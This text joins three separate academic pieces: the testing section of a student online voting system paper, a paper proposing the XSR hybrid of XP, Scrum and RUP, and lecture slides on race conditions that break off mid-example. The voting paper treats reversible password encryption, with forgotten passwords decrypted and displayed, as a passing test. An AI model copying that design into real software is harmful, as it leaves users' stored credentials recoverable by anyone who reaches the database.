White box and black box testing are the most common approaches to testing software-based systems, though other methods may be used as well.

5.1.1 Black Box Testing

The tester employs this method, also called functional testing, without knowledge of the system's inner workings. Instead of testing the actual code, the tester runs tests against criteria that have already been defined: the end user enters data into the system and verifies that it produces the intended result. A benefit of black box testing is that users of the system can perform the tests with no prior knowledge of the system's code. [36]

5.1.2 White Box Testing

The purpose of this approach, also called structural testing or glass box testing, is to examine the inner workings of the system's code and logic. To find any broken code, the tester must clearly understand the code used to build the system. [35] Both methodologies must be used for the system to be tested appropriately.

5.1.3 Test Plan

A test plan is necessary for thoroughly testing the online voting system's functionality; it structures the testing procedure so that any issue with the online voting system is addressed. The primary targets of testing are the various web browsers, the system and database servers, and the web pages; browser tests are needed because the system's functionality depends on the browsers its users run. The login authentication elements are the main emphasis of the testing process, since they prevent unauthorised access and keep the system secure. Tests verify the encryption and decryption of the passwords in use; the system's form validation is tested to make sure the user gets the right message when forms are not filled out properly; and the database engine that links the application to the database system is verified to ensure that data obtained from users really enters the database. A sketch of what such checks might look like as automated tests follows.
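As an illustration of the black-box login checks (test refs 7 and 9 in the table below), here is a hedged JUnit 4 sketch. AuthService is a hypothetical in-memory stand-in for the real login logic, included only so the example runs on its own:

```java
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;

import java.util.HashMap;
import java.util.Map;
import org.junit.Test;

// Hypothetical stand-in for the servlet's login logic, with the
// three-strikes rule from Table 1 baked in for demonstration.
class AuthService {
    private final Map<String, Integer> failures = new HashMap<>();

    boolean login(String user, String pass) {
        boolean ok = !isBlocked(user) && "secret".equals(pass); // demo credential
        if (!ok) failures.merge(user, 1, Integer::sum);
        return ok;
    }

    boolean isBlocked(String user) {
        return failures.getOrDefault(user, 0) >= 3;             // attempts log
    }
}

public class LoginValidationTest {
    @Test
    public void rejectsWrongPassword() {                        // test ref 7
        assertFalse(new AuthService().login("voter1", "wrong"));
    }

    @Test
    public void blocksAfterThreeFailedAttempts() {              // test ref 9
        AuthService auth = new AuthService();
        for (int i = 0; i < 3; i++) auth.login("voter1", "wrong");
        assertTrue(auth.isBlocked("voter1"));
    }
}
```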
5.2 TEST DATA

<table>
<thead>
<tr>
<th>Test Ref No</th>
<th>Test Data</th>
<th>Expected Outcome</th>
<th>Final Result</th>
</tr>
</thead>
<tbody>
<tr><td>1</td><td>Connect to server</td><td>The client should be able to connect to the server</td><td>Pass</td></tr>
<tr><td>2</td><td>Connect to MySQL database</td><td>The client should be able to connect to the database</td><td>Pass</td></tr>
<tr><td>3</td><td>Test Internet Explorer browser compatibility</td><td>When the user enters the online voting URL, the welcome page should be displayed</td><td>Pass</td></tr>
<tr><td>4</td><td>Test Netscape browser compatibility</td><td>When the user enters the online voting URL, the welcome page should be displayed</td><td>Pass</td></tr>
<tr><td>5</td><td>Test SSL connection from web browser</td><td>Using the secure localhost port 8443, the user should be able to reach the website over a secure connection</td><td>Pass</td></tr>
<tr><td>6</td><td>Web page navigation</td><td>Navigation links should open the specified web page</td><td>Pass</td></tr>
<tr><td>7</td><td>Login validation</td><td>An error message should be displayed when inappropriate data is entered</td><td>Pass</td></tr>
<tr><td>8</td><td>Login process distinguishes voter and administrator</td><td>A voter should not be allowed to log in to the admin page, and an admin should not be allowed to log in to the voter page</td><td>Pass</td></tr>
<tr><td>9</td><td>Attempt to guess password more than three times during login</td><td>The user should be blocked from accessing the system on the third attempt</td><td>Pass</td></tr>
<tr><td>10</td><td>Voter views and selects a candidate and submits a vote</td><td>The voter's choice of candidates should be displayed on the confirmation page</td><td>Pass</td></tr>
<tr><td>11</td><td>Voter casts votes</td><td>The voters table in the voting database should be updated with the new votes</td><td>Pass</td></tr>
<tr><td>12</td><td>Login block for voter</td><td>A voter who has voted once should be flagged and blocked from voting again</td><td>Pass</td></tr>
<tr><td>13</td><td>Voting results page</td><td>The vote count should be updated when a new vote is cast</td><td>Pass</td></tr>
<tr><td>14</td><td>Add voter, candidate and administrator validation</td><td>An error message should be generated if required boxes are not filled in, or if the chosen username is already taken</td><td>Pass</td></tr>
<tr><td>15</td><td>JDBC connection to database</td><td>Data from the registration form should be entered into the database</td><td>Pass</td></tr>
<tr><td>16</td><td>Password encryption</td><td>Passwords entered into the database should be encrypted</td><td>Pass</td></tr>
<tr><td>17</td><td>Administrator views voter, candidate &amp; admin details from the database</td><td>Data from the database should be printed on screen</td><td>Pass</td></tr>
<tr><td>18</td><td>Administrator deletes voter, candidate and administrator details</td><td>Details of the voter, candidate &amp; administrator should be deleted from the database</td><td>Pass</td></tr>
<tr><td>19</td><td>Password decryption</td><td>A forgotten password requested by a user should be decrypted before being sent to the user's screen</td><td>Pass</td></tr>
<tr><td>20</td><td>Logoff</td><td>The user should be able to log off successfully from the system</td><td>Pass</td></tr>
</tbody>
</table>

VI. CONCLUSION

This section reviews the evolution of the overall system and gives a glimpse into the steps taken to complete the project. Goals and objectives from the original plan, as well as those that proved unattainable, are also covered, along with the project's flaws and what needs fixing to improve the system in the future.

The primary goal of this research was to provide a safe method of internet voting. The project's overarching goal was to migrate from paper ballots to electronic ones, so that people could cast their ballots from anywhere in the world with an internet connection. The many online voting systems available today were examined, their features compared and contrasted, to learn how to get more people to cast their ballots. Several server-side technologies were researched in order to choose the most appropriate programming language for building the online voting system. Potential threats to the online voting system's security were examined and strategies to mitigate them developed. After a thorough evaluation of several software development approaches, the waterfall methodology was determined to be the most suitable development approach for this specific project. The primary goal of the system's design and development was to realise a solution in accordance with the ideas presented in the system proposal; at this stage, the process for building the system was laid out in detail. Developing a user-friendly interface for data retrieval, securing the system, and querying the database using Java classes and scripts were the primary goals. To find any flaws or weaknesses, the system was subjected to extensive testing throughout the project's testing phase, and based on the test findings it was determined to be ready for delivery to end users. Given its intended application in the student union election process, the developed system achieved its goals of being both easy to use and secure.

REFERENCES

1. Jayson Falkner, Ben Galbraith, Romin Irani, Casey Kochmer, Sathya Narayana Panduranga, Krishnaraj
5. Bruce W. Perry (2004), Java Servlet & JSP Cookbook, O'Reilly
7. Time Stamp. URL: http://whatis.techtarget.com/definition/0,,sid9_gci817089,00.html
{"Source-Url": "https://www.jsrtjournal.com/index.php/JSRT/article/download/91/115", "len_cl100k_base": 6011, "olmocr-version": "0.1.50", "pdf-total-pages": 18, "total-fallback-pages": 0, "total-input-tokens": 42101, "total-output-tokens": 7231, "length": "2e12", "weborganizer": {"__label__adult": 0.0003812313079833984, "__label__art_design": 0.000423431396484375, "__label__crime_law": 0.0015192031860351562, "__label__education_jobs": 0.003131866455078125, "__label__entertainment": 0.00015044212341308594, "__label__fashion_beauty": 0.00020241737365722656, "__label__finance_business": 0.0003788471221923828, "__label__food_dining": 0.00045418739318847656, "__label__games": 0.0026302337646484375, "__label__hardware": 0.0017766952514648438, "__label__health": 0.00060272216796875, "__label__history": 0.0005254745483398438, "__label__home_hobbies": 9.626150131225586e-05, "__label__industrial": 0.0004832744598388672, "__label__literature": 0.0002760887145996094, "__label__politics": 0.0028667449951171875, "__label__religion": 0.00039124488830566406, "__label__science_tech": 0.08251953125, "__label__social_life": 0.00018131732940673828, "__label__software": 0.025970458984375, "__label__software_dev": 0.87353515625, "__label__sports_fitness": 0.0005249977111816406, "__label__transportation": 0.0006122589111328125, "__label__travel": 0.00017344951629638672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 31903, 0.02477]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 31903, 0.5553]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 31903, 0.91051]], "google_gemma-3-12b-it_contains_pii": [[0, 3767, false], [3767, 6479, null], [6479, 10505, null], [10505, 13241, null], [13241, 13639, null], [13639, 13679, null], [13679, 13723, null], [13723, 14974, null], [14974, 16340, null], [16340, 17323, null], [17323, 17853, null], [17853, 19479, null], [19479, 21082, null], [21082, 24010, null], [24010, 25006, null], [25006, 26843, null], [26843, 31128, null], [31128, 31903, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3767, true], [3767, 6479, null], [6479, 10505, null], [10505, 13241, null], [13241, 13639, null], [13639, 13679, null], [13679, 13723, null], [13723, 14974, null], [14974, 16340, null], [16340, 17323, null], [17323, 17853, null], [17853, 19479, null], [19479, 21082, null], [21082, 24010, null], [24010, 25006, null], [25006, 26843, null], [26843, 31128, null], [31128, 31903, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 31903, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 31903, null]], "pdf_page_numbers": [[0, 3767, 1], [3767, 6479, 2], [6479, 10505, 3], [10505, 13241, 4], [13241, 
13639, 5], [13639, 13679, 6], [13679, 13723, 7], [13723, 14974, 8], [14974, 16340, 9], [16340, 17323, 10], [17323, 17853, 11], [17853, 19479, 12], [19479, 21082, 13], [21082, 24010, 14], [24010, 25006, 15], [25006, 26843, 16], [26843, 31128, 17], [31128, 31903, 18]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 31903, 0.17816]]}
olmocr_science_pdfs
2024-12-02
2024-12-02
c98dbecda554c5294641a800e7e4ab8c00612ee0
XSR: Novel Hybrid Software Development Model (Integrating XP, Scrum & RUP)

Gul Ahmad, Tariq Rahim Soomro, Mohammad Nawaz Brohi

Abstract— Software industries are progressively adopting the agile development practices of customized models such as Extreme Programming (XP), Scrum, or the Rational Unified Process (RUP). Scrum and XP are frequently used agile models, whereas RUP is a popular classic plan-driven software development methodology. Both agile and plan-driven models have their own merits and demerits: XP offers good engineering practices and team collaboration, but weak documentation and poor performance on medium- and large-scale projects; Scrum is based on project management practices; RUP is impractical for small, fast-paced projects, tends to run over budget, and handles rapid changes in requirements poorly. This paper proposes a novel hybrid framework, XSR, that combines the strengths of Scrum, XP, and RUP while suppressing their limitations, in order to produce high-quality software.

Index Terms— eXtreme Programming (XP), Scrum, Rational Unified Process (RUP), XP Scrum RUP (XSR)

I. INTRODUCTION

Extreme Programming (XP) is the most widely adopted agile practice, used in organizations and the software industry throughout the world. XP is a simple, lightweight agile methodology for small-scale, simple projects, built on five core working values: communication, simplicity, feedback, courage, and respect. XP is designed for small teams that need to work in a fast software development environment where requirements change frequently and exceptionally. XP works by bringing the whole team together around simple practices, with continuous feedback that lets the project team see where it stands. XP is resource-oriented rather than process-centric. It follows an iterative and incremental approach, focusing heavily on regular customer collaboration and embracing change anytime, anywhere. Releases are delivered in small iterations with a minimal error level, and project artifacts are prioritized so that the highest-priority tasks are worked on first. Handling rapidly changing business requirements is XP's main capability: through direct customer involvement and constant feedback, XP has a positive impact on the business requirements, producing high-quality software matched to customer desires. XP's main strengths include rapid development, low cost, high quality, result-oriented development, small bug rates, and the embracing of rapid change at any stage with the minimum possible expense. Common XP practices include the Planning Game, Small Releases, Metaphor, Simple Design, Tests, Refactoring, Pair Programming, Collective Ownership, Continuous Integration, the 40-hour Week, an On-site Customer, and Coding Standards [1][2][3][4][5][6][21][24].

Scrum is a popular and widely adopted agile software development model. Scrum focuses on project leadership and some aspects of requirements management, derived from the best business practices in terms of productivity and quality. Scrum is a lightweight framework, suitable for integration with other iterative, incremental models on complicated projects, and it can promote existing business practices, increasing both the quality and the productivity of projects. The iteration in Scrum is called a sprint, and Scrum is well suited to distributed teams from project initialization onward.
A sprint is a time-boxed iteration of two to six weeks. When requirements are unclear and ambiguous, the Scrum development methodology is the best practice. Scrum speeds up development, aligns objectives, fosters a creative business culture, promotes shareholder value, and encourages individual improvement; it helps software providers and vendors compete for market value. The main objective of Scrum development is to manage the system development process with practices that deliver high-quality software. Scrum promotes self-organizing teams and provides a productive, flexible working environment. It is an incremental and iterative process technique built around continuous communication meetings, which highlight overlapping areas, module integration, and data validation. The sprint, or time box, in Scrum usually runs from two to four weeks, which helps finish a project within a few months [3][7][8][9][10][20][23].

The Rational Unified Process (RUP) is an incremental, iterative, plan-oriented architectural framework focused on standard software engineering principles. It is a step-by-step process methodology for producing high-quality object-oriented software projects. RUP is a conventional, plan-driven approach that provides a very clear, structured, and formalized flow for software development, based on planning-centric processes, extensive system analysis, proper design principles, standard coding processes, and an extended level of documentation. RUP suits large-scale projects thanks to its extensive documentation, use-case-driven nature, predictability, quality assurance, tailoring, and tool support, and it can also be customized and tailored to business requirements in mid-level projects [11][12][20][21].

The core idea behind this study is to propose a hybrid model (XSR) that combines the best practices of the existing models (XP, Scrum & RUP) while suppressing their limitations, increasing the software industry's capability to deliver high-quality software projects on time and within budget. The XSR (XP, Scrum & RUP) model integrates eXtreme Programming (XP), Scrum, and the Rational Unified Process (RUP): XP's focus is to provide very effective engineering practices, Scrum's main goal is to provide an effective framework for project management, and RUP is a conventional model grounded in documentation and planning. This integrated hybrid model combines their best practices to satisfy business and customer needs; the resulting outcome is a rich, productive, and efficient model, i.e., XSR, carrying the best engineering and management practices of software engineering [13][14][15][22][25].

The proposed novel hybrid model, XSR, is the collaborative container for the best practices and strengths of XP, Scrum, and RUP: XP provides the best software engineering practices, Scrum offers the best project management features, and RUP directs the accomplishment of business objectives and customer satisfaction. The proposed hybrid model combines the good features of XP, Scrum, and RUP and reduces their pitfalls, providing a quality software development model that meets business needs and embraces change smartly.
XSR (XP, Scrum and RUP) is intended to embed the management features of Scrum, the coding and standards strengths of XP, and the business-objective accomplishment and customer satisfaction of RUP. The main logic behind creating the XSR model is to have a development methodology capable of producing high-quality products with a low bug rate [14][25]. This paper is organized as follows: section 2 discusses why we need the hybrid model XSR; section 3 explores the proposed hybrid model XSR; and section 4 concludes with a discussion and future directions.

II. WHY DO WE NEED XSR?

Different agile models have been tried and practiced in integration with plan-driven, conventional software development models to increase the throughput of both agile and classic models, while trying to suppress the pitfalls and limitations of each approach. Integrating the Scrum, XP, and RUP methodologies is a good combination for enriching the practices of both plan-driven and agile approaches. XP focuses on engineering practices and coding standards but lacks project management expertise; XP practices apply mainly to small projects and are fully dependent on the customer, which increases the risk of project failure. Scrum, on the other hand, focuses on project management practices and is silent about software engineering processes, and it requires technically sound, qualified resources to build the team. The RUP model also carries risks and limitations, such as over-budgeting, slow response to rapid changes in requirements, and suitability only for medium- and large-scale projects rather than fast-paced, small-scale ones; a major pitfall of RUP is that it provides no proper guidelines for project implementation, leaving that entirely to the user. The best practices of Scrum and XP for embracing rapid changes in requirements are intended to be added to the XSR model, whereas RUP fails to adapt to frequent requirement changes because it rests on extensive system requirements documentation. The primary strength of the RUP model is meeting business requirements and customer satisfaction by delivering high-quality software and adequate planning of the system. Given this context for XP, Scrum, and RUP, the research problem becomes: "the need to propose a hybrid model that integrates the strengths of XP, Scrum & RUP and narrows their flaws, to build a quality software development model that adapts to creeping requirements quickly, with planning and documentation" [13][15][16][3][22].

XSR is not a methodology but a generalized framework from which anyone can choose the ideas that suit a given organization or project [14]. XSR also has some extra structure that is absent from some agile models. Some points arguing that the framework is worthwhile: [18]

- XSR is an integrated framework of leading agile models, combining a set of complementary strengths from Scrum, XP & the Unified Process.
- Existing agile models mostly lack practices covering the full life cycle; Scrum, for instance, is management-oriented rather than architecture-centric. XSR is a hybrid framework gleaning strengths from the full lifecycle.
- XSR explicitly recognizes that almost all enterprise-level projects go through startup and deployment efforts, namely the inception and transition phases, respectively.
- XSR favours unbranded nomenclature: rather than sticking to one methodology's branded terms such as "sprint", it recommends common-language words that are easy to understand.

XSR is not meant to replace any existing agile practice but to simplify and promote them. Instead of saying "I am working on a project using Scrum, with some XP here and some RUP practices there", one can simply say "we are using the XSR framework". For instance, a team now doing Scrum could still say it is following the XSR framework. With agile capabilities one may push for speed, for quality, or for additional scaling; XSR can help with these ideas wherever they make sense for the project. In short, XSR provides comprehensive guidance, with unbranded ideas that go beyond traditional agile models, helping organizations handle enterprise as well as informal projects [18].

III. PROPOSED HYBRID SOFTWARE DEVELOPMENT MODEL XSR

As described above, agile practices are not well tested on large-scale projects, but analysts claim that complex, large projects can take advantage of them. To overcome this issue, we build a hybrid model by combining leading agile methodologies: XP, Scrum, and RUP. The XSR hybrid framework supports and extends the disciplines and principles of the agile manifesto. Project teams using iterative, incremental, or agile processes tend to produce higher-quality software, with a higher return on investment (ROI), greater stakeholder satisfaction, and more rapid delivery than a conventional process model or an ad-hoc approach. High quality can be achieved through techniques such as refactoring, continuous integration (CI), test-first development (TFD), and developer regression testing (DRT); return on investment can be increased by focusing on primary value activities in priority order, self-management, automation of routine activities, close collaboration, and so on [14][18].

XSR conceptualizes many techniques and principles from the three most popular methodologies, i.e., XP, Scrum & RUP. Most XSR practices are taken from the agile community, such as daily meetings, continuous integration (CI), and refactoring. XSR is a hybrid process model/framework that adopts and tailors techniques and practices from a variety of sources. The XSR model/framework integrates the following methods: [18]

A. Extreme Programming

XSR inherits the strategies of XP, including but not limited to collective code ownership, refactoring, TDD (test-driven development), CI (continuous integration), and others.

B. Scrum

Scrum's primary focus is on requirements management, guidelines, and leadership. XSR tailors many ideas from Scrum while ignoring many Scrum practices as well. XSR adopts the prioritized work-item list, the product-owner representative role, and the expectation of a potentially shippable deliverable from each iteration; however, XSR sets aside some Scrum ideas and terminology, avoiding branded terms such as "Scrum master" and "sprint" in favour of plain language.

C. Unified Process (UP)

The XSR process framework tailors many ideas and strategies from agile unified processes such as the Open Unified Process (OUP) and the Agile Unified Process (AUP). These include explicit phases and lightweight milestones, as well as proving the architecture and eliminating risks in the initial iterations, as shown in Figure-1 below.
Fig. 1: Comparison of XP, Scrum & RUP in XSR

XSR provides a proper project lifecycle covering initialization, construction, and release to the end user. XSR recognizes that iterations are not all the same: they can evolve with changes in project requirements along the lifecycle. XSR believes in simplicity, and therefore divides the project into phases, each with lightweight milestones, to focus on doing the right things at the right time with the proper direction. These phases cover initial visioning, architectural modeling, risk management, and deployment planning. The lifecycle has several critical features:

1) Delivery Lifecycle

The XSR lifecycle extends the Scrum lifecycle to show explicitly the complete delivery lifecycle, from the initialization of a project to its release into production.

2) Explicit Phases

The XSR lifecycle consists of three phases, an inception phase, a construction phase, and a transition phase, reflecting the agile C3 (Coordinate, Collaborate, Conclude) cycle, as shown in Figure-2 below. [18]

Fig. 2: XSR lifecycle

3) Explicit Milestones

The XSR framework contains a variety of milestones, which play an important role in governance and in eliminating project risks. Let us walk through the XSR phases to better understand the contents of the XSR process framework [18].

a) The Inception Phase

Plan-driven models invest a large amount of effort and time in up-front project planning. Agile methodologies, by contrast, discourage detailed up-front work, addressing business requirements, time frame, and budget constraints only briefly; they suggest a very small investment of effort and time in project up-front planning. The agile catchword might be "let's just get started and figure out where we are going as we go". Some agile models recommend a very short planning iteration, called "Sprint 0" in Scrum and the "Planning Game" in XP; the Planning Game's usual length is around 3.9 weeks. The XSR hybrid model introduces the need to set the right direction before moving ahead, spending from a few days to a few weeks on initialization. Table-1 shows the inception phase goals.

Table-1
<table>
<thead>
<tr><th>Inception Phase Goals</th></tr>
</thead>
<tbody>
<tr><td>- Define the project vision</td></tr>
<tr><td>- Reach agreement with stakeholders on the project plan and requirements</td></tr>
<tr><td>- Build the team</td></tr>
<tr><td>- Secure the project budget</td></tr>
<tr><td>- Clear the risks</td></tr>
<tr><td>- Define the initial technical strategy</td></tr>
</tbody>
</table>

b) The Construction Phase

In XSR, the construction phase is the timeline in which working software is built and the required functionality is completed. This timeline is broken into sub-timelines, or time-boxes, called iterations. All iterations of the same project should be of the same length, typically 2-4 weeks. The output of each iteration is a potentially deliverable solution with proper testing. In this phase, enough functionality is delivered to justify the cost of transition, also called the minimum marketable release (MMR), as accepted by the stakeholders [18]. Table-2 shows the construction phase goals.
Table-2
<table>
<thead>
<tr><th>Construction Phase Iteration Goals</th></tr>
</thead>
<tbody>
<tr><td>- Develop a potential solution</td></tr>
<tr><td>- Address rapid changes in stakeholder requirements</td></tr>
<tr><td>- Produce deployable releases</td></tr>
<tr><td>- Continuously improve quality</td></tr>
<tr><td>- Identify major risks</td></tr>
</tbody>
</table>

c) The Transition Phase

The XSR transition phase focuses on deploying and delivering the working software to the marketplace. Its duration depends on the nature and size of the project as well as the business requirements. Transitioning an external release is harder than an internal one: an externally released system requires high-level testing, with many alpha and beta tests, before going to market. The result at the end of the transition phase is a fully stakeholder-accepted, deployed system [18]. Table-3 shows the transition phase goals, and Table-4 shows other ongoing goals.

Table-3
<table>
<thead>
<tr><th>Transition Phase Goals</th></tr>
</thead>
<tbody>
<tr><td>- Make sure the deliverable is ready for transition</td></tr>
<tr><td>- Make sure the users are ready to receive the solution</td></tr>
<tr><td>- Deploy the solution to production</td></tr>
</tbody>
</table>

Table-4
<table>
<thead>
<tr><th>Other Ongoing Goals</th></tr>
</thead>
<tbody>
<tr><td>- Fulfil the project mission</td></tr>
<tr><td>- Continuously grow the team's skills</td></tr>
<tr><td>- Extend the infrastructure</td></tr>
<tr><td>- Improve the working process and environment</td></tr>
<tr><td>- Utilize the infrastructure</td></tr>
</tbody>
</table>

IV. DISCUSSION AND FUTURE WORK

The primary aim of this research is a generic software development model for building quality software that is delivered on time, meets customer needs, and boosts team performance. The XSR framework combines the strengths of three popular agile models, XP, RUP, and Scrum, while suppressing their pitfalls. XP contributes software engineering practices such as user stories, pair programming, and test-driven activities; Scrum is noted for its managerial techniques, its role-based approach, and its artifacts throughout the project development lifecycle; RUP helps by providing structured, skeletal, formalized guidelines throughout the lifecycle and also supports XP practices through its philosophy [1].

Like other customized agile models (XP, Scrum, Lean, Kanban, Crystal Clear, etc.), the proposed XSR framework needs proper testing and review in real, practical environments before it can be promoted. Various industries, as well as individual professionals, are already working to improve the practices of XP, Scrum, and RUP for managing software development and project delivery. We suggest promoting this new hybrid framework further by evaluating it in projects and organizations of various sizes and types, across different business environments; practical implementation of XSR can expose its shortcomings and flaws and improve it through the sharing of practical experience. Some recommendations for future work on extending the XSR framework: [19]

- The XSR framework can be further integrated with other models and standards to reach the best solution.
- More case studies and surveys with agile and business professionals, across a variety of projects and businesses, could improve the XSR framework.
- Real implementation of the XSR framework would support improvement of the hybrid model.
Real application of the XSR hybrid model will take time, because every practitioner is cautious about implementing a new model or practice that has not yet proved itself. The best approaches and practices improve gradually but continuously, through testing and evidence; the benefits of the XSR framework will only be realized after more application in real environments [19].

REFERENCES

Dr. Tariq Rahim Soomro: Ph.D. in Computer Applications (China), M.Sc. in Computer Science (Pakistan), B.Sc. (Hons) in Computer Science (Pakistan); Senior Member IEEE USA; Senior Member IEEE Computer Society USA; Senior Member IEEE Geoscience & Remote Sensing Society USA; Senior Member IACSIT; Member Project Management Institute (PMI); Life Member Computer Society of Pakistan (CSP); Life Member Sindhi Graduates Association (SGA) Pakistan; Global Member Internet Society (ISOC) USA. Interests: GIS, IDNS, DSN, distance education, e-commerce, multimedia, web, Internet, UNICODE, WAP, P2P, bioinformatics, telemedicine, networking, databases, programming, writing technical articles.

Dr. M. N. Brohi: Ph.D. in Information Technology from Preston University; M.Phil. in Computer Science from North East University of Science and Technology, Shenyang, China; M.Sc. in Computer Science from Quaid-e-Azam University, Pakistan. mnbrohi@szabist.ac.ae
{"Source-Url": "http://www.ijsce.org/wp-content/uploads/papers/v4i2/B2228054214.pdf", "len_cl100k_base": 4368, "olmocr-version": "0.1.50", "pdf-total-pages": 5, "total-fallback-pages": 0, "total-input-tokens": 19001, "total-output-tokens": 5857, "length": "2e12", "weborganizer": {"__label__adult": 0.00035500526428222656, "__label__art_design": 0.00026607513427734375, "__label__crime_law": 0.00028228759765625, "__label__education_jobs": 0.001346588134765625, "__label__entertainment": 4.035234451293945e-05, "__label__fashion_beauty": 0.00014650821685791016, "__label__finance_business": 0.0005297660827636719, "__label__food_dining": 0.00036072731018066406, "__label__games": 0.0004031658172607422, "__label__hardware": 0.0004727840423583984, "__label__health": 0.00040531158447265625, "__label__history": 0.00016987323760986328, "__label__home_hobbies": 7.128715515136719e-05, "__label__industrial": 0.0003082752227783203, "__label__literature": 0.00019502639770507812, "__label__politics": 0.0002161264419555664, "__label__religion": 0.0003666877746582031, "__label__science_tech": 0.0032825469970703125, "__label__social_life": 8.469820022583008e-05, "__label__software": 0.0035152435302734375, "__label__software_dev": 0.986328125, "__label__sports_fitness": 0.00031566619873046875, "__label__transportation": 0.00040531158447265625, "__label__travel": 0.00019037723541259768}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26028, 0.02238]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26028, 0.05342]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26028, 0.91791]], "google_gemma-3-12b-it_contains_pii": [[0, 5297, false], [5297, 11627, null], [11627, 16698, null], [16698, 23048, null], [23048, 26028, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5297, true], [5297, 11627, null], [11627, 16698, null], [16698, 23048, null], [23048, 26028, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26028, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26028, null]], "pdf_page_numbers": [[0, 5297, 1], [5297, 11627, 2], [11627, 16698, 3], [16698, 23048, 4], [23048, 26028, 5]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26028, 0.24324]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
a86fad53b3ba32841a9f8fb24e9889edac7148e2
CSE 332: Data Structures & Parallelism
Lecture 18: Race Conditions & Deadlock
Ruth Anderson, Autumn 2018

Outline

Done:
- The semantics of locks
- Locks in Java
- Using locks for mutual exclusion: bank-account example

This lecture:
- Race conditions: data races vs. bad interleavings
- Guidelines/idioms for shared memory and using locks correctly
- Coarse-grained vs. fine-grained (for locks and critical sections)
- Deadlock

Race Conditions

A race condition occurs when the computation result depends on scheduling (how threads are interleaved):
- If T1 and T2 happen to get scheduled in a certain way, things go wrong
- We, as programmers, cannot control the scheduling of threads
- Thus we need to write programs that work independent of scheduling

Race conditions are bugs that exist only due to concurrency: with only one thread there are no interleaved-scheduling problems. Typically the problem is that some intermediate state can be seen by another thread and screws up that other thread. Consider a 'partial' insert in a linked list: say, a new node has been added to the end, but 'back' and 'count' haven't been updated yet.

Race Conditions: Data Races vs. Bad Interleavings

We will make a big distinction between:
- data races
- bad interleavings

Both are kinds of race-condition bugs. Confusion often results from not distinguishing them, or from using the ambiguous term "race condition" to mean only one of them.

Data Races (briefly)

A data race is a specific type of race condition that can happen in two ways:
- Two different threads potentially write a variable at the same time
- One thread potentially writes a variable while another reads it

Simultaneous reads are not a race and produce no errors. 'Potentially' is important: we claim the code itself has a data race, independent of any particular actual execution. Data races are bad, but we can still have a race condition, and bad behavior, when no data races are present: through bad interleavings, which we discuss now.

Stack Example (pseudocode)

```java
class Stack<E> {
  private E[] array = (E[]) new Object[SIZE];
  private int index = -1;
  synchronized boolean isEmpty() {
    return index == -1;
  }
  synchronized void push(E val) {
    array[++index] = val;
  }
  synchronized E pop() {
    if (isEmpty())
      throw new StackEmptyException();
    return array[index--];
  }
}
```

Example of a Race Condition, but not a Data Race

```java
class Stack<E> {
  ... // state used by isEmpty, push, pop
  synchronized boolean isEmpty() { ... }
  synchronized void push(E val) { ... }
  synchronized E pop() {
    if (isEmpty())
      throw new StackEmptyException();
    ...
  }
  E peek() { // this is wrong
    E ans = pop();
    push(ans);
    return ans;
  }
}
```

peek, sequentially speaking

In a sequential world, this code is of questionable style but unquestionably correct. The "algorithm" is the only way to write a peek helper method if all you had was this interface:

```java
interface Stack<E> {
  boolean isEmpty();
  void push(E val);
  E pop();
}

class C {
  static <E> E myPeek(Stack<E> s) { ??? }
}
```
} }
```

Problems with `peek`

- `peek` has no *overall* effect on the shared data
  - It is a "reader", not a "writer"
  - State should be the same after it executes as before
- But the way it is implemented creates an inconsistent *intermediate state*
- Calls to `push` and `pop` are synchronized
  - So there are no *data races* on the underlying array/index
- There is still a *race condition* though
  - This intermediate state should not be exposed
  - Leads to several *bad interleavings*

Example 1: peek and isEmpty

- **Property we want**: If there has been a push (and no pop), then isEmpty should return false
- With peek as written, the property can be violated – how?

```java
// Thread 1 (peek)
E ans = pop();
push(ans);
return ans;

